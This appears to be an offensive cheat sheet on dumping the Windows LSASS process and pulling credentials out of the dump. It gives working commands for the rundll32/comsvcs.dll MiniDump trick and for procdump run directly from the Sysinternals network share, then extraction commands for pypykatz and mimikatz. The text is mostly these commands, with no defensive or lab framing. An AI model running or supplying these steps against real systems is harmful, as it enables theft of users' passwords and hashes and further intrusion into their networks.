The Local Security Authority Subsystem Service (LSASS) is a process in Windows that is responsible for enforcing the security policy on the system.
The lsass.exe file used by Windows is located in the %SystemRoot%\System32\Lsass.exe.

LSASS Dump File

Creating a memory dump of the LSASS process allows for offline credential extraction. This approach involves making a copy of the LSASS process memory, which can then be analyzed without remaining connected to the target system.

Command line dumping:

# Dumping LSASS using - comsvcs.dll (powershell)
rundll32 C:\windows\system32\comsvcs.dll, MiniDump <PID> C:\lsass.dmp full
 
# Dumping LSASS using - procdump (sysinternals)
\\live.sysinternals.com\tools\procdump -accepteula -ma lsass.exe C:\lsass.dmp

Creating dump file via task manager:

A file called lsass.DMP is created and saved in: %TEMP%.

Extract Credentials

Once we have the dump file, we can extract the credentials from the process memory dump file using appropriate tools.

# Extract using - pypykatz (https://github.com/skelsec/pypykatz)
pypykatz lsa minidump lsass.dmp
# Extract using - mimikatz (https://github.com/gentilkiwi/mimikatz)
privilege::debug
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords